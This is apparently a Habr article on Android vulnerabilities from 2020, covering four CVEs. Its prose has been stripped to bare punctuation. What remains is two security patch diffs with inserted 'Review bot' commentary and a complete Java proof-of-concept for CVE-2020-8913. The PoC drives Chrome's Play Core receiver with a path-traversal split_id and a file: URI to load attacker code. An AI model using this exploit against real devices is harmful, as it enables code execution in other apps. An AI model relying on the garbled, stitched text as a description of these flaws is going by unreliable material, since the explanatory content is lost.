Android 2020 vulnerabilities

Hello, Habr. We are sharing with you a useful article by Alexander Kolesnikov.

Android . , , , . , , ? ? CWE TOP 25? Android ? Android 2020 .

Android

, . Android.

. 2 :

  1. ;

  2. Android , open source .

, , , 1 . . , . .

CVE-2020-0082

Android 10. CWE Top 25, CWE-502. , . , . , , -, . .

Android . system_server.

diff --git a/core/java/android/os/ExternalVibration.java b/core/java/android/os/ExternalVibration.java
index 37ca868..041d21f 100644
--- a/core/java/android/os/ExternalVibration.java
+++ b/core/java/android/os/ExternalVibration.java
@@ -157,7 +157,6 @@
         out.writeInt(mUid);
         out.writeString(mPkg);
         writeAudioAttributes(mAttrs, out, flags);
-        out.writeParcelable(mAttrs, flags);
         out.writeStrongBinder(mController.asBinder());
         out.writeStrongBinder(mToken);
     }
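
Review bot: the removed line `out.writeParcelable(mAttrs, flags);` was writing mAttrs a second time immediately after `writeAudioAttributes(mAttrs, out, flags);`, so this hunk fixes only the write side of the parcel. The matching read path (the Parcel constructor or CREATOR) is not in the hunk and must consume exactly the fields now written, in this order; if it still performs a readParcelable for mAttrs, the write/read mismatch that lets a different object type be reconstructed remains. Suggest adding a round-trip unit test that parcels an ExternalVibration, unparcels it, and asserts every field.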
      
Parcel "android.accounts.IAccountAuthenticatorResponse".

CVE-2020-8913

Android Play Core . receiver . , Parcel. Google Chrome:

// Imports and the enclosing Activity class (name assumed) added so the fragment compiles;
// EvilParcelable is referenced by the original but its definition is not shown on the page.
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.os.Parcelable;
import java.util.ArrayList;
import java.util.Arrays;

public class PocActivity extends Activity {
    // Package that ships the vulnerable Play Core receiver (Chrome in this write-up)
    public static final String APP = "com.android.chrome";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Launch the application so its Play Core receiver is active
        Intent launchIntent = getPackageManager().getLaunchIntentForPackage(APP);
        startActivity(launchIntent);
        // Build the split Intent: a file: URI pointing at this APK and a split_id containing path traversal
        new Handler().postDelayed(() -> {
            Intent split = new Intent();
            split.setData(Uri.parse("file://" + getApplicationInfo().sourceDir));
            split.putExtra("split_id", "../verified-splits/config.test");
            // Session state Bundle: status 3 plus the list of split file Intents
            Bundle bundle = new Bundle();
            bundle.putInt("status", 3);
            bundle.putParcelableArrayList("split_file_intents", new ArrayList<Parcelable>(Arrays.asList(split)));
            // Deliver the session state to the Play Core update receiver inside the application
            Intent intent = new Intent("com.google.android.play.core.splitinstall.receiver.SplitInstallUpdateIntentService");
            intent.setPackage(APP);
            intent.putExtra("session_state", bundle);
            sendBroadcast(intent);
        }, 3000);
        // Finally, relaunch the application with the EvilParcelable extra (class not shown on the page)
        new Handler().postDelayed(() -> {
            startActivity(launchIntent.putExtra("x", new EvilParcelable()));
        }, 5000);
    }
}
      
CVE-2020-8899

. 100% , Android, C . Samsung.

, Android .

, , . . CWE-787.

CVE-2020-0022

BlueTooth Android 8 9. . CWE-787.

diff --git a/hci/src/packet_fragmenter.cc b/hci/src/packet_fragmenter.cc
index 5036ed5..143fc23 100644
--- a/hci/src/packet_fragmenter.cc
+++ b/hci/src/packet_fragmenter.cc
@@ -221,7 +221,8 @@
                  "%s got packet which would exceed expected length of %d. "
                  "Truncating.",
                  __func__, partial_packet->len);
-        packet->len = partial_packet->len - partial_packet->offset;
+        packet->len =
+            (partial_packet->len - partial_packet->offset) + packet->offset;
         projected_offset = partial_packet->len;
       }
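
Review bot: the new assignment `packet->len = (partial_packet->len - partial_packet->offset) + packet->offset;` changes what `packet->len` means in this branch, from the number of remaining bytes to a length measured from the start of the buffer, which is why `packet->offset` is now added; a one-line comment saying so would make the truncation branch self-explanatory, since the old line looked plausible and was wrong. The "Truncating." log above it could also print the resulting length, and a regression test that feeds a fragment exceeding `partial_packet->len` would pin this fix.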
      
. 300 33 .

, , . , .

Android- . .
